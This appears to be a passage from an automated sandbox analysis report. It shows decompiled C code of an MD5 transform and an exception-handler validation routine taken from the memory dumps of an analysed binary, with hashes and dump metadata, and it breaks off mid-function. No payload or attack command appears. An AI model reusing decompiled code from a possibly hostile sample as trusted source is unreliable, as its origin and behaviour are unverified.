				signed int _t747;

				// _a4 points at the four 32-bit state words (offsets 0, 4, 8, 0xc).
				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				// Copy 16 words from the input block (__ecx) into the local array starting at _v76.
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				// MD5 round 1: F(x,y,z) = (x & y) | (~x & z), rotations 7, 12, 17, 22
				// (ror 0xf == rol 17, ror 0xa == rol 22). Negative constants are the
				// standard MD5 table values in two's complement, e.g. -0x28955b88 == 0xd76aa478.
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				// MD5 round 2: G(x,y,z) = (x & z) | (y & ~z), rotations 5, 9, 14, 20 (ror 0xc == rol 20).
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				// MD5 round 3: H(x,y,z) = x ^ y ^ z, rotations 4, 11, 16, 23 (ror 0x9 == rol 23).
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                                                    				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                                                                                                                                                                                                                                                    				asm("rol edi, 0xb");
                                                                                                                                                                                                                                                                                    				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0x10");
                                                                                                                                                                                                                                                                                    				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                                                                                                                                                                                                                                                    				_t337 = _t606 ^ _t427;
                                                                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                                                    				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                                                    				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0xb");
                                                                                                                                                                                                                                                                                    				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                                                                                                                                                                                                                                                    				asm("rol edi, 0x10");
                                                                                                                                                                                                                                                                                    				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                                                                                                                                                                                                                                                    				_t429 = _t733 ^ _t612;
                                                                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                                                    				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                                                                    				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0xb");
                                                                                                                                                                                                                                                                                    				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0x10");
                                                                                                                                                                                                                                                                                    				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                                                                    				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                                                    				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                                                    				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                                                    				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                                                                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                                                                    				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                                                    				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                                                    				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                                                    				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                                                                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                                                                    				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                                                    				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                                                    				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                                                    				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                                                                                                                                                                                                                                                    				asm("ror edi, 0xb");
                                                                                                                                                                                                                                                                                    				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                                                                    				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
                                                                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                                                                    				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
                                                                                                                                                                                                                                                                                    				_t399 = _a4;
                                                                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                                                                    				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
                                                                                                                                                                                                                                                                                    				 *_t399 =  *_t399 + _t259;
                                                                                                                                                                                                                                                                                    				asm("ror eax, 0xb");
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
                                                                                                                                                                                                                                                                                    				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                                                                    0x00fc6763
                                                                                                                                                                                                                                                                                    0x00fc677d
                                                                                                                                                                                                                                                                                    0x00fc6780
                                                                                                                                                                                                                                                                                    0x00fc6796
                                                                                                                                                                                                                                                                                    0x00fc6799
                                                                                                                                                                                                                                                                                    0x00fc679b
                                                                                                                                                                                                                                                                                    0x00fc67b6
                                                                                                                                                                                                                                                                                    0x00fc67b9
                                                                                                                                                                                                                                                                                    0x00fc67d0
                                                                                                                                                                                                                                                                                    0x00fc67d3
                                                                                                                                                                                                                                                                                    0x00fc67d7
                                                                                                                                                                                                                                                                                    0x00fc67f0
                                                                                                                                                                                                                                                                                    0x00fc67f3
                                                                                                                                                                                                                                                                                    0x00fc67f5
                                                                                                                                                                                                                                                                                    0x00fc67f8
                                                                                                                                                                                                                                                                                    0x00fc6813
                                                                                                                                                                                                                                                                                    0x00fc6816
                                                                                                                                                                                                                                                                                    0x00fc682f
                                                                                                                                                                                                                                                                                    0x00fc6832
                                                                                                                                                                                                                                                                                    0x00fc6842
                                                                                                                                                                                                                                                                                    0x00fc6845
                                                                                                                                                                                                                                                                                    0x00fc685d
                                                                                                                                                                                                                                                                                    0x00fc6860
                                                                                                                                                                                                                                                                                    0x00fc687a
                                                                                                                                                                                                                                                                                    0x00fc687d
                                                                                                                                                                                                                                                                                    0x00fc6895
                                                                                                                                                                                                                                                                                    0x00fc6898
                                                                                                                                                                                                                                                                                    0x00fc68ae
                                                                                                                                                                                                                                                                                    0x00fc68b1
                                                                                                                                                                                                                                                                                    0x00fc68c9
                                                                                                                                                                                                                                                                                    0x00fc68cc
                                                                                                                                                                                                                                                                                    0x00fc68e4
                                                                                                                                                                                                                                                                                    0x00fc68e7
                                                                                                                                                                                                                                                                                    0x00fc6901
                                                                                                                                                                                                                                                                                    0x00fc6904
                                                                                                                                                                                                                                                                                    0x00fc691a
                                                                                                                                                                                                                                                                                    0x00fc691d
                                                                                                                                                                                                                                                                                    0x00fc6935
                                                                                                                                                                                                                                                                                    0x00fc6938
                                                                                                                                                                                                                                                                                    0x00fc6952
                                                                                                                                                                                                                                                                                    0x00fc6955
                                                                                                                                                                                                                                                                                    0x00fc696d
                                                                                                                                                                                                                                                                                    0x00fc6970
                                                                                                                                                                                                                                                                                    0x00fc6986
                                                                                                                                                                                                                                                                                    0x00fc6989
                                                                                                                                                                                                                                                                                    0x00fc69a1
                                                                                                                                                                                                                                                                                    0x00fc69a4
                                                                                                                                                                                                                                                                                    0x00fc69bc
                                                                                                                                                                                                                                                                                    0x00fc69bf
                                                                                                                                                                                                                                                                                    0x00fc69d1
                                                                                                                                                                                                                                                                                    0x00fc69d4
                                                                                                                                                                                                                                                                                    0x00fc69e6
                                                                                                                                                                                                                                                                                    0x00fc69e9
                                                                                                                                                                                                                                                                                    0x00fc69fb
                                                                                                                                                                                                                                                                                    0x00fc69fe
                                                                                                                                                                                                                                                                                    0x00fc6a02
                                                                                                                                                                                                                                                                                    0x00fc6a12
                                                                                                                                                                                                                                                                                    0x00fc6a15
                                                                                                                                                                                                                                                                                    0x00fc6a23
                                                                                                                                                                                                                                                                                    0x00fc6a26
                                                                                                                                                                                                                                                                                    0x00fc6a38
                                                                                                                                                                                                                                                                                    0x00fc6a3b
                                                                                                                                                                                                                                                                                    0x00fc6a4f
                                                                                                                                                                                                                                                                                    0x00fc6a52
                                                                                                                                                                                                                                                                                    0x00fc6a54
                                                                                                                                                                                                                                                                                    0x00fc6a64
                                                                                                                                                                                                                                                                                    0x00fc6a67
                                                                                                                                                                                                                                                                                    0x00fc6a79
                                                                                                                                                                                                                                                                                    0x00fc6a7c
                                                                                                                                                                                                                                                                                    0x00fc6a8a
                                                                                                                                                                                                                                                                                    0x00fc6a8d
                                                                                                                                                                                                                                                                                    0x00fc6a9f
                                                                                                                                                                                                                                                                                    0x00fc6aa2
                                                                                                                                                                                                                                                                                    0x00fc6aa6
                                                                                                                                                                                                                                                                                    0x00fc6ab6
                                                                                                                                                                                                                                                                                    0x00fc6ab9
                                                                                                                                                                                                                                                                                    0x00fc6acb
                                                                                                                                                                                                                                                                                    0x00fc6ace
                                                                                                                                                                                                                                                                                    0x00fc6adc
                                                                                                                                                                                                                                                                                    0x00fc6adf
                                                                                                                                                                                                                                                                                    0x00fc6af1
                                                                                                                                                                                                                                                                                    0x00fc6af4
                                                                                                                                                                                                                                                                                    0x00fc6b06
                                                                                                                                                                                                                                                                                    0x00fc6b09
                                                                                                                                                                                                                                                                                    0x00fc6b1d
                                                                                                                                                                                                                                                                                    0x00fc6b20
                                                                                                                                                                                                                                                                                    0x00fc6b34
                                                                                                                                                                                                                                                                                    0x00fc6b37
                                                                                                                                                                                                                                                                                    0x00fc6b4b
                                                                                                                                                                                                                                                                                    0x00fc6b4e
                                                                                                                                                                                                                                                                                    0x00fc6b62
                                                                                                                                                                                                                                                                                    0x00fc6b65
                                                                                                                                                                                                                                                                                    0x00fc6b79
                                                                                                                                                                                                                                                                                    0x00fc6b7c
                                                                                                                                                                                                                                                                                    0x00fc6b90
                                                                                                                                                                                                                                                                                    0x00fc6b95
                                                                                                                                                                                                                                                                                    0x00fc6ba7
                                                                                                                                                                                                                                                                                    0x00fc6baa

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                    • Opcode ID: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
                                                                                                                                                                                                                                                                                    • Instruction ID: 6c2ceccd82edb532d2e72253980e20d5f0c33f250589f409492196cb1cecfb46
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E422847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: c15ad4930112c82b4e26323fef8472f5668a047b5edb9cb9d24cbe9eac22ec40
                                                                                                                                                                                                                                                                                    • Instruction ID: 396ad989791fcdb48f30d3365afd1d415d625f31b86645b9e20ce73c450ae6ff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c15ad4930112c82b4e26323fef8472f5668a047b5edb9cb9d24cbe9eac22ec40
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2226B0A14914DFDB08CF6CD698B597BF2BB8A300B94E62DE59597389C7306C06CF85
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E6E052485(long _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                                                    							_t81 =  *0x6e0541f8;
                                                                                                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                                                                                                    										 *0x6e054240 = 1;
                                                                                                                                                                                                                                                                                    										__eflags =  *0x6e054240;
                                                                                                                                                                                                                                                                                    										if( *0x6e054240 != 0) {
                                                                                                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t84 =  *0x6e0541f8;
                                                                                                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                                                                    												 *0x6e054240 = 0;
                                                                                                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                                                                                                    													 *0x6e0541f8 = _t86;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                                                    													_t68 = 0x6e054200 + _t94 * 4;
                                                                                                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t69 = 0x6e0541fc + _t84 * 4;
                                                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                                                                                                    											}
